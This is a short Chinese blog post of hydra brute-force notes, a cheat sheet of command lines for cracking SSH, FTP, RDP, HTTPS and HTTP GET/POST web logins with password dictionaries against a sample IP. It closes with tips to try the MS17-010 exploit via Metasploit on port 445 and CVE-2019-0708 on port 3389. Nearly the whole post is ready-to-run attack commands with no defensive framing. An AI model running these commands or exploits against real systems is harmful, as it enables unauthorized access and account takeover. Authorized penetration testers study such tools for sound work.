• hydra 爆破笔记


    含有 ftp,ssh,mysql的端口可以丢进 hydra 爆破

    1、破解ssh: 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh 
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 


    2、破解ftp: 
    hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV 
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 


    3、get方式提交,破解web登录: 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ 
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php


    4、post方式提交,破解web登录: 
    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" 
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" 
    (参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中 的内容是表示错误猜解的返回信息提示。) 


    5、破解https: 
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 


    6、破解rdp: 
    hydra ip rdp -l administrator -P pass.txt -V

    445端口可以MSF尝试一下 ms17-010
    3389端口可以尝试一下最新爆出的 CVE-2019-0708
    作者:求知鱼

    -------------------------------------------

    个性签名:你有一个苹果,我有一个苹果,我们交换一下,一人还是只有一个苹果;你有一种思想,我有一种思想,我们交换一下,一个人就有两种思想。

    如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!

    独学而无友,则孤陋而寡闻,开源、分享、白嫖!

  • 相关阅读:
    【纪中集训2019.3.19】原样输出
    【纪中集训2019.3.11】树上四次求和
    【纪中集训2019.3.11】Cubelia
    【纪中集训2019.3.14】小凯的疑惑
    leetcode 18 4Sum
    leetcode 17 Letter Combinations of a Phone Number
    leetcode 11 Container With Most Water
    leetcode 16 3Sum Closest
    leetcode 15 3Sum
    leetcode 14 Longest Common Prefix
  • 原文地址:https://www.cnblogs.com/Qiuzhiyu/p/12533380.html
Copyright © 2020-2023  润新知